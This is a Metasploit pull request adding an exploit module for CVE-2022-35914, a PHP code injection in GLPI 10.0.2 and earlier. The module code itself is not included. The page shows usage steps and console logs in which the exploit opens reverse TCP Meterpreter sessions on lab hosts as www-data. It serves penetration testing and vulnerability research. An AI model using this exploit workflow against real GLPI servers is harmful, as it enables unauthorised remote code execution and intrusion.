
Add RCE module for CVE-2022-35914 php code injection #17162

Merged
merged 6 commits into from
Oct 24, 2022

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Oct 19, 2022

This PR adds a module for CVE-2022-35914, a php command injection vulnerability in GLPI versions up to and including 10.0.2.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/glpi_htmlawed_php_injection
  • set uripath <uripath>
  • set rhost <rhost>
  • set lhost <lhost>
  • Verify you get a session
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > show options

Module options (exploit/linux/http/glpi_htmlawed_php_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /glpi/           no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.109     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set rhost 10.5.132.190
rhost => 10.5.132.190
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set uripath /glpi/glpi/
uripath => /glpi/glpi/
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set verbose true
verbose => true
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > check

[*] populate_values
[*] token = a7a58e70d2ff93dfd906d325bb7e5b61
[*] sid = 5h8k1gqcjhp8u7q37h3v14uegc
[*] 10.5.132.190:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 10.5.135.109:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] populate_values
[*] token = c19463adacf7224c3ebaa35e7f8422c8
[*] sid = q2efgo77srae1pgjttj9tqqcjg
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] execute_command
[*] Sending stage (40164 bytes) to 10.5.132.190
[*] Meterpreter session 1 opened (10.5.135.109:4444 -> 10.5.132.190:53030) at 2022-10-19 14:43:02 -0500

meterpreter > sysinfo
Computer        : ubuntu-20041
OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > getuid
Server username: www-data
meterpreter > 

@bwatters-r7 bwatters-r7 added module needs-docs rn-modules release notes for new or majorly enhanced modules labels Oct 19, 2022
@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 marked this pull request as ready for review October 19, 2022 23:01
@jheysel-r7 jheysel-r7 self-assigned this Oct 21, 2022
Co-authored-by: Brendan <bwatters@rapid7.com>
@jheysel-r7 jheysel-r7 merged commit 3bf4bd7 into rapid7:master Oct 24, 2022
@jheysel-r7
Contributor

Release Notes

This PR adds a module for CVE-2022-35914, a php command injection vulnerability in GLPI versions up to and including 10.0.2.

@jheysel-r7
Contributor

Thanks for the great PR @bwatters-r7! The installation instructions were straightforward and to the point. Was able to get a vulnerable instance installed without issues. Everything seems logically and grammatically correct in everything from docs to exploit and check methods 👌

msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40168 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:55466) at 2022-10-24 12:33:04 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.130 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set target 1
target => 1
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 172.16.199.130
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:43856) at 2022-10-24 12:33:41 -0400
[*] Command Stager progress - 100.00% done (809/809 bytes)

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           : Ubuntu 20.04 (Linux 5.15.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
